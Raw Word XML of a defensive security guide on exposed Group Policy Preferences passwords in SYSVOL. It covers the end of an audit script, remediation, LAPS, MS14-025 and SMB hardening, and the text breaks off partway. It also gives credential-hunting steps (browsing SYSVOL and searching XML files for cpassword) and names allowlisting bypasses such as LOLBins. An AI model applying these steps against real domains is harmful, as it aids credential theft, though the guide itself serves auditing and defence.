                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ForegroundColor Green</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">} </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Write-Host</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">"[X] Scan complete. Found </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$VulnerabilitiesFound</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerable </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>file(s). Immediate remediation required."</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ForegroundColor Red</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D2FCCCF" w14:textId="6566111E" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F962F95" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7695A99D" w14:textId="77777777"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What to Do If the Script Finds a Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698F5FA" w14:textId="77777777"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If the script outputs a file path, an attacker can trivially decrypt that password using the publicly known AES key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15216119" w14:textId="77777777"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To safely remediate this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96B76D" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Back Up the File</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Copy the identified XML file to a secure, offline location before making changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D07A50A" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Delete or Edit the GPO</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Open the Group Policy Management Console (</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gpmc.msc</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), find the specific policy linked to that XML file, and manually remove or recreate the preference setting without saving credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BCF1F" w14:textId="08BC2B8C" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Change the Password</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Assume the exposed password is completely compromised. Change that account's password everywhere it is used across the domain immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24B515" w14:textId="20942D55"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So, how does reconnaissance happen under such restrictive policies? If an organization has properly locked down and hardened administrative functions on end-user workstations, such as the command-line, an auditor (or an attacker) will not be able to simply open PowerShell on a standard workstation to run a script. Instead, they must adapt their methods to bypass or find a workaround these restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9FFE5" w14:textId="22292B52"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Native GUI Navigation (Living-Off-The-Land (LOTL))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D522E" w14:textId="6250134F"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Even if CLI (Command-Line Interface) utilities are completely blocked, standard users still require basic network access to pull informational updates via domain replication and Group Policies. If the user account has the requisite access, the human user can browse the network manually (but only up until a certain point):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3322E2" w14:textId="7BA166B5" w:rsid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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open Windows File Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F8FC5" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425D16A1" w14:textId="508A1C60" w:rsidR="00442C76" w:rsidRP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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\\&lt;DC_IP&gt;\SYSVOL\</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly into the address bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50819924" w14:textId="2F8FBD7F" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193E818E" w14:textId="750B607D" w:rsidR="00442C76" w:rsidRP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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the built-in Windows Search feature to look for </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> files containing the word </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*cpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC77CE" w14:textId="23AC33C9"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 xml:space="preserve">Because File Explorer is a trusted system application, it is rarely blocked by </w:t>
      </w:r>
      <w:r w:rsidR="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AppLocker</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unless explicitly told to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DDF816" w14:textId="67CB9C38"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Non-Standard Administrative Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E55B3D" w14:textId="67649C04"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Auditors typically request access to a Jump Box, a Bastion Host, or a designated test machine where command-line restrictions are lifted for testing purposes. Running the script from a specialized audit machine targeting the Domain Controller bypasses the local workstation restrictions entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47796EF1" w14:textId="6619BB6A"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lastRenderedPageBreak/>
        <w:t>Bypassing Application Allowlisting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B303367" w14:textId="4C375ACD" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>From an attacking lens, if an attacker compromises a standard user account on a hardened workstation, they will actively look for configuration loopholes to spawn execution environments. Common techniques include, but are not limited to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F1800" w14:textId="1D55D9ED" w:rsid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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Renaming or copying custom binaries to user-writable directories (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AppData\Local\Temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4947CE4A" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75252CCB" w14:textId="286CE8BC" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizing native, trusted Microsoft binaries to execute code indirectly (known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LOLBins</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Living Off The Land Binaries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CE846" w14:textId="35F03C7F" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Defensive Control: Device Controls and Hardening</w:t>
      </w:r>
      <w:r w:rsidR="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Eliminate GPP Cleartext Passwords (MS14-025 Mitigation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929FCB2" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Immediate Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0D091" w14:textId="3269B594" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete existing XML files containing </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cpassword</w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fields from </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Microsoft released patch MS14-025, which prevents administrators from creating any </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GPP tasks with attached passwords; however, the patch </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">does not </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clean up old, pre-existing XML files that may contain previously used cached passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5CFDD3" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Modern Replacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BE8C2" w14:textId="4C51E8CE" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Transition local account management to Local Administrator Password Solution (LAPS). LAPS automatically randomizes local admin passwords and stores them securely as confidential AD attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA5EDD" w14:textId="2B7C8F72" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enforce SMB 3.11 Encryption and Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E9B3A2" w14:textId="0F8B3A10" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>SMB Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6098E1" w14:textId="77015423" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enabling SMB encryption will protect data in transit from interception attacks and eavesdropping. If an attacker sniffs network traffic, they will not be able to read data traveling over </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or other sensitive shares that have this enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8006C" w14:textId="77777777" w:rsidR="0024425A" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SMB Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D53E0" w14:textId="19B89A2B" w:rsidR="00442C76" w:rsidRPr="0024425A" w:rsidRDefault="00442C76" w:rsidP="0024425A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
